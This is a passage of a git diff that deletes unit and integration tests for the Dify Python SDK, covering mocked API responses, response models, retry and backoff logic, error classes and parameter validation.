mock_response.json.return_value = { - "document": { - "id": "doc_123", - "name": "Test Document", - "word_count": 100, - "status": "indexing", - } - } - mock_request.return_value = mock_response - - # Set dataset_id directly for this test - self.client.dataset_id = "dataset_123" - - response = self.client.create_document_by_text(name="Test Document", text="This is test document content.") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["document"]["name"], "Test Document") - self.assertEqual(data["document"]["word_count"], 100) - - -class TestWorkspaceClientIntegration(unittest.TestCase): - """Integration tests for WorkspaceClient.""" - - def setUp(self): - self.client = WorkspaceClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_get_available_models(self, mock_request): - """Test get_available_models integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "models": [ - {"id": "gpt-4", "name": "GPT-4", "provider": "openai"}, - {"id": "claude-3", "name": "Claude 3", "provider": "anthropic"}, - ] - } - mock_request.return_value = mock_response - - response = self.client.get_available_models("llm") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["models"]), 2) - self.assertEqual(data["models"][0]["id"], "gpt-4") - - -class TestErrorScenariosIntegration(unittest.TestCase): - """Integration tests for error scenarios.""" - - def setUp(self): - self.client = DifyClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_authentication_error_integration(self, mock_request): - """Test authentication error in integration.""" - mock_response = Mock() - mock_response.status_code = 401 - mock_response.json.return_value = {"message": "Invalid API key"} - mock_request.return_value = mock_response - - with self.assertRaises(AuthenticationError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Invalid API key") - self.assertEqual(context.exception.status_code, 401) - - @patch("httpx.Client.request") - def test_rate_limit_error_integration(self, mock_request): - """Test rate limit error in integration.""" - mock_response = Mock() - mock_response.status_code = 429 - mock_response.json.return_value = {"message": "Rate limit exceeded"} - mock_response.headers = {"Retry-After": "60"} - mock_request.return_value = mock_response - - with self.assertRaises(RateLimitError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Rate limit exceeded") - self.assertEqual(context.exception.retry_after, "60") - - @patch("httpx.Client.request") - def test_server_error_no_retry_integration(self, mock_request): - """Test that a server error (5xx) raises APIError immediately without retrying.""" - # API errors don't retry by design - only network/timeout errors retry - mock_response_500 = Mock() - mock_response_500.status_code = 500 - mock_response_500.json.return_value = {"message": "Internal server error"} - - mock_request.return_value = mock_response_500 - - with patch("time.sleep"): # Skip actual sleep - with self.assertRaises(APIError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Internal server error") - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - def test_validation_error_integration(self, mock_request): - """Test validation error in integration.""" - mock_response = Mock() - 
mock_response.status_code = 422 - mock_response.json.return_value = { - "message": "Validation failed", - "details": {"field": "query", "error": "required"}, - } - mock_request.return_value = mock_response - - with self.assertRaises(ValidationError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Validation failed") - self.assertEqual(context.exception.status_code, 422) - - -class TestContextManagerIntegration(unittest.TestCase): - """Integration tests for context manager usage.""" - - @patch("httpx.Client.close") - @patch("httpx.Client.request") - def test_context_manager_usage(self, mock_request, mock_close): - """Test context manager properly closes connections.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = {"id": "app_123", "name": "Test App"} - mock_request.return_value = mock_response - - with DifyClient("test_api_key") as client: - response = client.get_app_info() - self.assertEqual(response.status_code, 200) - - # Verify close was called - mock_close.assert_called_once() - - @patch("httpx.Client.close") - def test_manual_close(self, mock_close): - """Test manual close method.""" - client = DifyClient("test_api_key") - client.close() - mock_close.assert_called_once() - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_models.py b/sdks/python-client/tests/test_models.py deleted file mode 100644 index db9d92ad5b..0000000000 --- a/sdks/python-client/tests/test_models.py +++ /dev/null @@ -1,640 +0,0 @@ -"""Unit tests for response models.""" - -import unittest -import json -from datetime import datetime -from dify_client.models import ( - BaseResponse, - ErrorResponse, - FileInfo, - MessageResponse, - ConversationResponse, - DatasetResponse, - DocumentResponse, - DocumentSegmentResponse, - WorkflowRunResponse, - ApplicationParametersResponse, - AnnotationResponse, - PaginatedResponse, - ConversationVariableResponse, - FileUploadResponse, - AudioResponse, - SuggestedQuestionsResponse, - AppInfoResponse, - WorkspaceModelsResponse, - HitTestingResponse, - DatasetTagsResponse, - WorkflowLogsResponse, - ModelProviderResponse, - FileInfoResponse, - WorkflowDraftResponse, - ApiTokenResponse, - JobStatusResponse, - DatasetQueryResponse, - DatasetTemplateResponse, -) - - -class TestResponseModels(unittest.TestCase): - """Test cases for response model classes.""" - - def test_base_response(self): - """Test BaseResponse model.""" - response = BaseResponse(success=True, message="Operation successful") - self.assertTrue(response.success) - self.assertEqual(response.message, "Operation successful") - - def test_base_response_defaults(self): - """Test BaseResponse with default values.""" - response = BaseResponse(success=True) - self.assertTrue(response.success) - self.assertIsNone(response.message) - - def test_error_response(self): - """Test ErrorResponse model.""" - response = ErrorResponse( - success=False, - message="Error occurred", - error_code="VALIDATION_ERROR", - details={"field": "invalid_value"}, - ) - self.assertFalse(response.success) - self.assertEqual(response.message, "Error occurred") - self.assertEqual(response.error_code, "VALIDATION_ERROR") - self.assertEqual(response.details["field"], "invalid_value") - - def test_file_info(self): - """Test FileInfo model.""" - now = datetime.now() - file_info = FileInfo( - id="file_123", - name="test.txt", - size=1024, - mime_type="text/plain", - url="https://example.com/file.txt", - created_at=now, - ) - 
self.assertEqual(file_info.id, "file_123") - self.assertEqual(file_info.name, "test.txt") - self.assertEqual(file_info.size, 1024) - self.assertEqual(file_info.mime_type, "text/plain") - self.assertEqual(file_info.url, "https://example.com/file.txt") - self.assertEqual(file_info.created_at, now) - - def test_message_response(self): - """Test MessageResponse model.""" - response = MessageResponse( - success=True, - id="msg_123", - answer="Hello, world!", - conversation_id="conv_123", - created_at=1234567890, - metadata={"model": "gpt-4"}, - files=[{"id": "file_1", "type": "image"}], - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "msg_123") - self.assertEqual(response.answer, "Hello, world!") - self.assertEqual(response.conversation_id, "conv_123") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.metadata["model"], "gpt-4") - self.assertEqual(response.files[0]["id"], "file_1") - - def test_conversation_response(self): - """Test ConversationResponse model.""" - response = ConversationResponse( - success=True, - id="conv_123", - name="Test Conversation", - inputs={"query": "Hello"}, - status="active", - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "conv_123") - self.assertEqual(response.name, "Test Conversation") - self.assertEqual(response.inputs["query"], "Hello") - self.assertEqual(response.status, "active") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.updated_at, 1234567891) - - def test_dataset_response(self): - """Test DatasetResponse model.""" - response = DatasetResponse( - success=True, - id="dataset_123", - name="Test Dataset", - description="A test dataset", - permission="read", - indexing_technique="high_quality", - embedding_model="text-embedding-ada-002", - embedding_model_provider="openai", - retrieval_model={"search_type": "semantic"}, - document_count=10, - word_count=5000, - app_count=2, - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "dataset_123") - self.assertEqual(response.name, "Test Dataset") - self.assertEqual(response.description, "A test dataset") - self.assertEqual(response.permission, "read") - self.assertEqual(response.indexing_technique, "high_quality") - self.assertEqual(response.embedding_model, "text-embedding-ada-002") - self.assertEqual(response.embedding_model_provider, "openai") - self.assertEqual(response.retrieval_model["search_type"], "semantic") - self.assertEqual(response.document_count, 10) - self.assertEqual(response.word_count, 5000) - self.assertEqual(response.app_count, 2) - - def test_document_response(self): - """Test DocumentResponse model.""" - response = DocumentResponse( - success=True, - id="doc_123", - name="test_document.txt", - data_source_type="upload_file", - position=1, - enabled=True, - word_count=1000, - hit_count=5, - doc_form="text_model", - created_at=1234567890.0, - indexing_status="completed", - completed_at=1234567891.0, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "doc_123") - self.assertEqual(response.name, "test_document.txt") - self.assertEqual(response.data_source_type, "upload_file") - self.assertEqual(response.position, 1) - self.assertTrue(response.enabled) - self.assertEqual(response.word_count, 1000) - self.assertEqual(response.hit_count, 5) - self.assertEqual(response.doc_form, "text_model") - self.assertEqual(response.created_at, 1234567890.0) - 
self.assertEqual(response.indexing_status, "completed") - self.assertEqual(response.completed_at, 1234567891.0) - - def test_document_segment_response(self): - """Test DocumentSegmentResponse model.""" - response = DocumentSegmentResponse( - success=True, - id="seg_123", - position=1, - document_id="doc_123", - content="This is a test segment.", - answer="Test answer", - word_count=5, - tokens=10, - keywords=["test", "segment"], - hit_count=2, - enabled=True, - status="completed", - created_at=1234567890.0, - completed_at=1234567891.0, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "seg_123") - self.assertEqual(response.position, 1) - self.assertEqual(response.document_id, "doc_123") - self.assertEqual(response.content, "This is a test segment.") - self.assertEqual(response.answer, "Test answer") - self.assertEqual(response.word_count, 5) - self.assertEqual(response.tokens, 10) - self.assertEqual(response.keywords, ["test", "segment"]) - self.assertEqual(response.hit_count, 2) - self.assertTrue(response.enabled) - self.assertEqual(response.status, "completed") - self.assertEqual(response.created_at, 1234567890.0) - self.assertEqual(response.completed_at, 1234567891.0) - - def test_workflow_run_response(self): - """Test WorkflowRunResponse model.""" - response = WorkflowRunResponse( - success=True, - id="run_123", - workflow_id="workflow_123", - status="succeeded", - inputs={"query": "test"}, - outputs={"answer": "result"}, - elapsed_time=5.5, - total_tokens=100, - total_steps=3, - created_at=1234567890.0, - finished_at=1234567895.5, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "run_123") - self.assertEqual(response.workflow_id, "workflow_123") - self.assertEqual(response.status, "succeeded") - self.assertEqual(response.inputs["query"], "test") - self.assertEqual(response.outputs["answer"], "result") - self.assertEqual(response.elapsed_time, 5.5) - self.assertEqual(response.total_tokens, 100) - self.assertEqual(response.total_steps, 3) - self.assertEqual(response.created_at, 1234567890.0) - self.assertEqual(response.finished_at, 1234567895.5) - - def test_application_parameters_response(self): - """Test ApplicationParametersResponse model.""" - response = ApplicationParametersResponse( - success=True, - opening_statement="Hello! How can I help you?", - suggested_questions=["What is AI?", "How does this work?"], - speech_to_text={"enabled": True}, - text_to_speech={"enabled": False, "voice": "alloy"}, - retriever_resource={"enabled": True}, - sensitive_word_avoidance={"enabled": False}, - file_upload={"enabled": True, "file_size_limit": 10485760}, - system_parameters={"max_tokens": 1000}, - user_input_form=[{"type": "text", "label": "Query"}], - ) - self.assertTrue(response.success) - self.assertEqual(response.opening_statement, "Hello! 
How can I help you?") - self.assertEqual(response.suggested_questions, ["What is AI?", "How does this work?"]) - self.assertTrue(response.speech_to_text["enabled"]) - self.assertFalse(response.text_to_speech["enabled"]) - self.assertEqual(response.text_to_speech["voice"], "alloy") - self.assertTrue(response.retriever_resource["enabled"]) - self.assertFalse(response.sensitive_word_avoidance["enabled"]) - self.assertTrue(response.file_upload["enabled"]) - self.assertEqual(response.file_upload["file_size_limit"], 10485760) - self.assertEqual(response.system_parameters["max_tokens"], 1000) - self.assertEqual(response.user_input_form[0]["type"], "text") - - def test_annotation_response(self): - """Test AnnotationResponse model.""" - response = AnnotationResponse( - success=True, - id="annotation_123", - question="What is the capital of France?", - answer="Paris", - content="Additional context", - created_at=1234567890.0, - updated_at=1234567891.0, - created_by="user_123", - updated_by="user_123", - hit_count=5, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "annotation_123") - self.assertEqual(response.question, "What is the capital of France?") - self.assertEqual(response.answer, "Paris") - self.assertEqual(response.content, "Additional context") - self.assertEqual(response.created_at, 1234567890.0) - self.assertEqual(response.updated_at, 1234567891.0) - self.assertEqual(response.created_by, "user_123") - self.assertEqual(response.updated_by, "user_123") - self.assertEqual(response.hit_count, 5) - - def test_paginated_response(self): - """Test PaginatedResponse model.""" - response = PaginatedResponse( - success=True, - data=[{"id": 1}, {"id": 2}, {"id": 3}], - has_more=True, - limit=10, - total=100, - page=1, - ) - self.assertTrue(response.success) - self.assertEqual(len(response.data), 3) - self.assertEqual(response.data[0]["id"], 1) - self.assertTrue(response.has_more) - self.assertEqual(response.limit, 10) - self.assertEqual(response.total, 100) - self.assertEqual(response.page, 1) - - def test_conversation_variable_response(self): - """Test ConversationVariableResponse model.""" - response = ConversationVariableResponse( - success=True, - conversation_id="conv_123", - variables=[ - {"id": "var_1", "name": "user_name", "value": "John"}, - {"id": "var_2", "name": "preferences", "value": {"theme": "dark"}}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(response.conversation_id, "conv_123") - self.assertEqual(len(response.variables), 2) - self.assertEqual(response.variables[0]["name"], "user_name") - self.assertEqual(response.variables[0]["value"], "John") - self.assertEqual(response.variables[1]["name"], "preferences") - self.assertEqual(response.variables[1]["value"]["theme"], "dark") - - def test_file_upload_response(self): - """Test FileUploadResponse model.""" - response = FileUploadResponse( - success=True, - id="file_123", - name="test.txt", - size=1024, - mime_type="text/plain", - url="https://example.com/files/test.txt", - created_at=1234567890.0, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "file_123") - self.assertEqual(response.name, "test.txt") - self.assertEqual(response.size, 1024) - self.assertEqual(response.mime_type, "text/plain") - self.assertEqual(response.url, "https://example.com/files/test.txt") - self.assertEqual(response.created_at, 1234567890.0) - - def test_audio_response(self): - """Test AudioResponse model.""" - response = AudioResponse( - success=True, - audio="base64_encoded_audio_data", - 
audio_url="https://example.com/audio.mp3", - duration=10.5, - sample_rate=44100, - ) - self.assertTrue(response.success) - self.assertEqual(response.audio, "base64_encoded_audio_data") - self.assertEqual(response.audio_url, "https://example.com/audio.mp3") - self.assertEqual(response.duration, 10.5) - self.assertEqual(response.sample_rate, 44100) - - def test_suggested_questions_response(self): - """Test SuggestedQuestionsResponse model.""" - response = SuggestedQuestionsResponse( - success=True, - message_id="msg_123", - questions=[ - "What is machine learning?", - "How does AI work?", - "Can you explain neural networks?", - ], - ) - self.assertTrue(response.success) - self.assertEqual(response.message_id, "msg_123") - self.assertEqual(len(response.questions), 3) - self.assertEqual(response.questions[0], "What is machine learning?") - - def test_app_info_response(self): - """Test AppInfoResponse model.""" - response = AppInfoResponse( - success=True, - id="app_123", - name="Test App", - description="A test application", - icon="🤖", - icon_background="#FF6B6B", - mode="chat", - tags=["AI", "Chat", "Test"], - enable_site=True, - enable_api=True, - api_token="app_token_123", - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "app_123") - self.assertEqual(response.name, "Test App") - self.assertEqual(response.description, "A test application") - self.assertEqual(response.icon, "🤖") - self.assertEqual(response.icon_background, "#FF6B6B") - self.assertEqual(response.mode, "chat") - self.assertEqual(response.tags, ["AI", "Chat", "Test"]) - self.assertTrue(response.enable_site) - self.assertTrue(response.enable_api) - self.assertEqual(response.api_token, "app_token_123") - - def test_workspace_models_response(self): - """Test WorkspaceModelsResponse model.""" - response = WorkspaceModelsResponse( - success=True, - models=[ - {"id": "gpt-4", "name": "GPT-4", "provider": "openai"}, - {"id": "claude-3", "name": "Claude 3", "provider": "anthropic"}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(len(response.models), 2) - self.assertEqual(response.models[0]["id"], "gpt-4") - self.assertEqual(response.models[0]["name"], "GPT-4") - self.assertEqual(response.models[0]["provider"], "openai") - - def test_hit_testing_response(self): - """Test HitTestingResponse model.""" - response = HitTestingResponse( - success=True, - query="What is machine learning?", - records=[ - {"content": "Machine learning is a subset of AI...", "score": 0.95}, - {"content": "ML algorithms learn from data...", "score": 0.87}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(response.query, "What is machine learning?") - self.assertEqual(len(response.records), 2) - self.assertEqual(response.records[0]["score"], 0.95) - - def test_dataset_tags_response(self): - """Test DatasetTagsResponse model.""" - response = DatasetTagsResponse( - success=True, - tags=[ - {"id": "tag_1", "name": "Technology", "color": "#FF0000"}, - {"id": "tag_2", "name": "Science", "color": "#00FF00"}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(len(response.tags), 2) - self.assertEqual(response.tags[0]["name"], "Technology") - self.assertEqual(response.tags[0]["color"], "#FF0000") - - def test_workflow_logs_response(self): - """Test WorkflowLogsResponse model.""" - response = WorkflowLogsResponse( - success=True, - logs=[ - {"id": "log_1", "status": "succeeded", "created_at": 1234567890}, - {"id": "log_2", "status": "failed", "created_at": 1234567891}, - ], - total=50, - page=1, - 
limit=10, - has_more=True, - ) - self.assertTrue(response.success) - self.assertEqual(len(response.logs), 2) - self.assertEqual(response.logs[0]["status"], "succeeded") - self.assertEqual(response.total, 50) - self.assertEqual(response.page, 1) - self.assertEqual(response.limit, 10) - self.assertTrue(response.has_more) - - def test_model_serialization(self): - """Test that models can be serialized to JSON.""" - response = MessageResponse( - success=True, - id="msg_123", - answer="Hello, world!", - conversation_id="conv_123", - ) - - # Convert to dict and then to JSON - response_dict = { - "success": response.success, - "id": response.id, - "answer": response.answer, - "conversation_id": response.conversation_id, - } - - json_str = json.dumps(response_dict) - parsed = json.loads(json_str) - - self.assertTrue(parsed["success"]) - self.assertEqual(parsed["id"], "msg_123") - self.assertEqual(parsed["answer"], "Hello, world!") - self.assertEqual(parsed["conversation_id"], "conv_123") - - # Tests for new response models - def test_model_provider_response(self): - """Test ModelProviderResponse model.""" - response = ModelProviderResponse( - success=True, - provider_name="openai", - provider_type="llm", - models=[ - {"id": "gpt-4", "name": "GPT-4", "max_tokens": 8192}, - {"id": "gpt-3.5-turbo", "name": "GPT-3.5 Turbo", "max_tokens": 4096}, - ], - is_enabled=True, - credentials={"api_key": "sk-..."}, - ) - self.assertTrue(response.success) - self.assertEqual(response.provider_name, "openai") - self.assertEqual(response.provider_type, "llm") - self.assertEqual(len(response.models), 2) - self.assertEqual(response.models[0]["id"], "gpt-4") - self.assertTrue(response.is_enabled) - self.assertEqual(response.credentials["api_key"], "sk-...") - - def test_file_info_response(self): - """Test FileInfoResponse model.""" - response = FileInfoResponse( - success=True, - id="file_123", - name="document.pdf", - size=2048576, - mime_type="application/pdf", - url="https://example.com/files/document.pdf", - created_at=1234567890, - metadata={"pages": 10, "author": "John Doe"}, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "file_123") - self.assertEqual(response.name, "document.pdf") - self.assertEqual(response.size, 2048576) - self.assertEqual(response.mime_type, "application/pdf") - self.assertEqual(response.url, "https://example.com/files/document.pdf") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.metadata["pages"], 10) - - def test_workflow_draft_response(self): - """Test WorkflowDraftResponse model.""" - response = WorkflowDraftResponse( - success=True, - id="draft_123", - app_id="app_456", - draft_data={"nodes": [], "edges": [], "config": {"name": "Test Workflow"}}, - version=1, - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "draft_123") - self.assertEqual(response.app_id, "app_456") - self.assertEqual(response.draft_data["config"]["name"], "Test Workflow") - self.assertEqual(response.version, 1) - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.updated_at, 1234567891) - - def test_api_token_response(self): - """Test ApiTokenResponse model.""" - response = ApiTokenResponse( - success=True, - id="token_123", - name="Production Token", - token="app-xxxxxxxxxxxx", - description="Token for production environment", - created_at=1234567890, - last_used_at=1234567891, - is_active=True, - ) - self.assertTrue(response.success) - 
self.assertEqual(response.id, "token_123") - self.assertEqual(response.name, "Production Token") - self.assertEqual(response.token, "app-xxxxxxxxxxxx") - self.assertEqual(response.description, "Token for production environment") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.last_used_at, 1234567891) - self.assertTrue(response.is_active) - - def test_job_status_response(self): - """Test JobStatusResponse model.""" - response = JobStatusResponse( - success=True, - job_id="job_123", - job_status="running", - error_msg=None, - progress=0.75, - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.job_id, "job_123") - self.assertEqual(response.job_status, "running") - self.assertIsNone(response.error_msg) - self.assertEqual(response.progress, 0.75) - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.updated_at, 1234567891) - - def test_dataset_query_response(self): - """Test DatasetQueryResponse model.""" - response = DatasetQueryResponse( - success=True, - query="What is machine learning?", - records=[ - {"content": "Machine learning is...", "score": 0.95}, - {"content": "ML algorithms...", "score": 0.87}, - ], - total=2, - search_time=0.123, - retrieval_model={"method": "semantic_search", "top_k": 3}, - ) - self.assertTrue(response.success) - self.assertEqual(response.query, "What is machine learning?") - self.assertEqual(len(response.records), 2) - self.assertEqual(response.total, 2) - self.assertEqual(response.search_time, 0.123) - self.assertEqual(response.retrieval_model["method"], "semantic_search") - - def test_dataset_template_response(self): - """Test DatasetTemplateResponse model.""" - response = DatasetTemplateResponse( - success=True, - template_name="customer_support", - display_name="Customer Support", - description="Template for customer support knowledge base", - category="support", - icon="🎧", - config_schema={"fields": [{"name": "category", "type": "string"}]}, - ) - self.assertTrue(response.success) - self.assertEqual(response.template_name, "customer_support") - self.assertEqual(response.display_name, "Customer Support") - self.assertEqual(response.description, "Template for customer support knowledge base") - self.assertEqual(response.category, "support") - self.assertEqual(response.icon, "🎧") - self.assertEqual(response.config_schema["fields"][0]["name"], "category") - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_retry_and_error_handling.py b/sdks/python-client/tests/test_retry_and_error_handling.py deleted file mode 100644 index bd415bde43..0000000000 --- a/sdks/python-client/tests/test_retry_and_error_handling.py +++ /dev/null @@ -1,313 +0,0 @@ -"""Unit tests for retry mechanism and error handling.""" - -import unittest -from unittest.mock import Mock, patch, MagicMock -import httpx -from dify_client.client import DifyClient -from dify_client.exceptions import ( - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - NetworkError, - TimeoutError, - FileUploadError, -) - - -class TestRetryMechanism(unittest.TestCase): - """Test cases for retry mechanism.""" - - def setUp(self): - self.api_key = "test_api_key" - self.base_url = "https://api.dify.ai/v1" - self.client = DifyClient( - api_key=self.api_key, - base_url=self.base_url, - max_retries=3, - retry_delay=0.1, # Short delay for tests - enable_logging=False, - ) - - @patch("httpx.Client.request") - def 
test_successful_request_no_retry(self, mock_request): - """Test that successful requests don't trigger retries.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.content = b'{"success": true}' - mock_request.return_value = mock_response - - response = self.client._send_request("GET", "/test") - - self.assertEqual(response, mock_response) - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - @patch("time.sleep") - def test_retry_on_network_error(self, mock_sleep, mock_request): - """Test retry on network errors.""" - # First two calls raise network error, third succeeds - mock_request.side_effect = [ - httpx.NetworkError("Connection failed"), - httpx.NetworkError("Connection failed"), - Mock(status_code=200, content=b'{"success": true}'), - ] - - response = self.client._send_request("GET", "/test") - - self.assertEqual(response.status_code, 200) - self.assertEqual(mock_request.call_count, 3) - self.assertEqual(mock_sleep.call_count, 2) - - @patch("httpx.Client.request") - @patch("time.sleep") - def test_retry_on_timeout_error(self, mock_sleep, mock_request): - """Test retry on timeout errors.""" - mock_request.side_effect = [ - httpx.TimeoutException("Request timed out"), - httpx.TimeoutException("Request timed out"), - Mock(status_code=200, content=b'{"success": true}'), - ] - - response = self.client._send_request("GET", "/test") - - self.assertEqual(response.status_code, 200) - self.assertEqual(mock_request.call_count, 3) - self.assertEqual(mock_sleep.call_count, 2) - - @patch("httpx.Client.request") - @patch("time.sleep") - def test_max_retries_exceeded(self, mock_sleep, mock_request): - """Test behavior when max retries are exceeded.""" - mock_request.side_effect = httpx.NetworkError("Persistent network error") - - with self.assertRaises(NetworkError): - self.client._send_request("GET", "/test") - - self.assertEqual(mock_request.call_count, 4) # 1 initial + 3 retries - self.assertEqual(mock_sleep.call_count, 3) - - @patch("httpx.Client.request") - def test_no_retry_on_client_error(self, mock_request): - """Test that client errors (4xx) don't trigger retries.""" - mock_response = Mock() - mock_response.status_code = 401 - mock_response.json.return_value = {"message": "Unauthorized"} - mock_request.return_value = mock_response - - with self.assertRaises(AuthenticationError): - self.client._send_request("GET", "/test") - - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - def test_no_retry_on_server_error(self, mock_request): - """Test that server errors (5xx) are not retried - they raise APIError immediately.""" - mock_response_500 = Mock() - mock_response_500.status_code = 500 - mock_response_500.json.return_value = {"message": "Internal server error"} - - mock_request.return_value = mock_response_500 - - with self.assertRaises(APIError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Internal server error") - self.assertEqual(context.exception.status_code, 500) - # Should not retry server errors - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - def test_exponential_backoff(self, mock_request): - """Test exponential backoff timing.""" - mock_request.side_effect = [ - httpx.NetworkError("Connection failed"), - httpx.NetworkError("Connection failed"), - httpx.NetworkError("Connection failed"), - 
httpx.NetworkError("Connection failed"), # All attempts fail - ] - - with patch("time.sleep") as mock_sleep: - with self.assertRaises(NetworkError): - self.client._send_request("GET", "/test") - - # Check exponential backoff: 0.1, 0.2, 0.4 - expected_calls = [0.1, 0.2, 0.4] - actual_calls = [call[0][0] for call in mock_sleep.call_args_list] - self.assertEqual(actual_calls, expected_calls) - - -class TestErrorHandling(unittest.TestCase): - """Test cases for error handling.""" - - def setUp(self): - self.client = DifyClient(api_key="test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_authentication_error(self, mock_request): - """Test AuthenticationError handling.""" - mock_response = Mock() - mock_response.status_code = 401 - mock_response.json.return_value = {"message": "Invalid API key"} - mock_request.return_value = mock_response - - with self.assertRaises(AuthenticationError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Invalid API key") - self.assertEqual(context.exception.status_code, 401) - - @patch("httpx.Client.request") - def test_rate_limit_error(self, mock_request): - """Test RateLimitError handling.""" - mock_response = Mock() - mock_response.status_code = 429 - mock_response.json.return_value = {"message": "Rate limit exceeded"} - mock_response.headers = {"Retry-After": "60"} - mock_request.return_value = mock_response - - with self.assertRaises(RateLimitError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Rate limit exceeded") - self.assertEqual(context.exception.retry_after, "60") - - @patch("httpx.Client.request") - def test_validation_error(self, mock_request): - """Test ValidationError handling.""" - mock_response = Mock() - mock_response.status_code = 422 - mock_response.json.return_value = {"message": "Invalid parameters"} - mock_request.return_value = mock_response - - with self.assertRaises(ValidationError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Invalid parameters") - self.assertEqual(context.exception.status_code, 422) - - @patch("httpx.Client.request") - def test_api_error(self, mock_request): - """Test general APIError handling.""" - mock_response = Mock() - mock_response.status_code = 500 - mock_response.json.return_value = {"message": "Internal server error"} - mock_request.return_value = mock_response - - with self.assertRaises(APIError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "Internal server error") - self.assertEqual(context.exception.status_code, 500) - - @patch("httpx.Client.request") - def test_error_response_without_json(self, mock_request): - """Test error handling when response doesn't contain valid JSON.""" - mock_response = Mock() - mock_response.status_code = 500 - mock_response.content = b"Internal Server Error" - mock_response.json.side_effect = ValueError("No JSON object could be decoded") - mock_request.return_value = mock_response - - with self.assertRaises(APIError) as context: - self.client._send_request("GET", "/test") - - self.assertEqual(str(context.exception), "HTTP 500") - - @patch("httpx.Client.request") - def test_file_upload_error(self, mock_request): - """Test FileUploadError handling.""" - mock_response = Mock() - mock_response.status_code = 400 - mock_response.json.return_value = {"message": "File upload failed"} - mock_request.return_value = mock_response - - with 
self.assertRaises(FileUploadError) as context: - self.client._send_request_with_files("POST", "/upload", {}, {}) - - self.assertEqual(str(context.exception), "File upload failed") - self.assertEqual(context.exception.status_code, 400) - - -class TestParameterValidation(unittest.TestCase): - """Test cases for parameter validation.""" - - def setUp(self): - self.client = DifyClient(api_key="test_api_key", enable_logging=False) - - def test_empty_string_validation(self): - """Test validation of empty strings.""" - with self.assertRaises(ValidationError): - self.client._validate_params(empty_string="") - - def test_whitespace_only_string_validation(self): - """Test validation of whitespace-only strings.""" - with self.assertRaises(ValidationError): - self.client._validate_params(whitespace_string=" ") - - def test_long_string_validation(self): - """Test validation of overly long strings.""" - long_string = "a" * 10001 # Exceeds 10000 character limit - with self.assertRaises(ValidationError): - self.client._validate_params(long_string=long_string) - - def test_large_list_validation(self): - """Test validation of overly large lists.""" - large_list = list(range(1001)) # Exceeds 1000 item limit - with self.assertRaises(ValidationError): - self.client._validate_params(large_list=large_list) - - def test_large_dict_validation(self): - """Test validation of overly large dictionaries.""" - large_dict = {f"key_{i}": i for i in range(101)} # Exceeds 100 item limit - with self.assertRaises(ValidationError): - self.client._validate_params(large_dict=large_dict) - - def test_valid_parameters_pass(self): - """Test that valid parameters pass validation.""" - # Should not raise any exception - self.client._validate_params( - valid_string="Hello, World!", - valid_list=[1, 2, 3], - valid_dict={"key": "value"}, - none_value=None, - ) - - def test_message_feedback_validation(self): - """Test validation in message_feedback method.""" - with self.assertRaises(ValidationError): - self.client.message_feedback("msg_id", "invalid_rating", "user") - - def test_completion_message_validation(self): - """Test validation in create_completion_message method.""" - from dify_client.client import CompletionClient - - client = CompletionClient("test_api_key") - - with self.assertRaises(ValidationError): - client.create_completion_message( - inputs="not_a_dict", # Should be a dict - response_mode="invalid_mode", # Should be 'blocking' or 'streaming' - user="test_user", - ) - - def test_chat_message_validation(self): - """Test validation in create_chat_message method.""" - from dify_client.client import ChatClient - - client = ChatClient("test_api_key") - - with self.assertRaises(ValidationError): - client.create_chat_message( - inputs="not_a_dict", # Should be a dict - query="", # Should not be empty - user="test_user", - response_mode="invalid_mode", # Should be 'blocking' or 'streaming' - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/uv.lock b/sdks/python-client/uv.lock deleted file mode 100644 index 4a9d7d5193..0000000000 --- a/sdks/python-client/uv.lock +++ 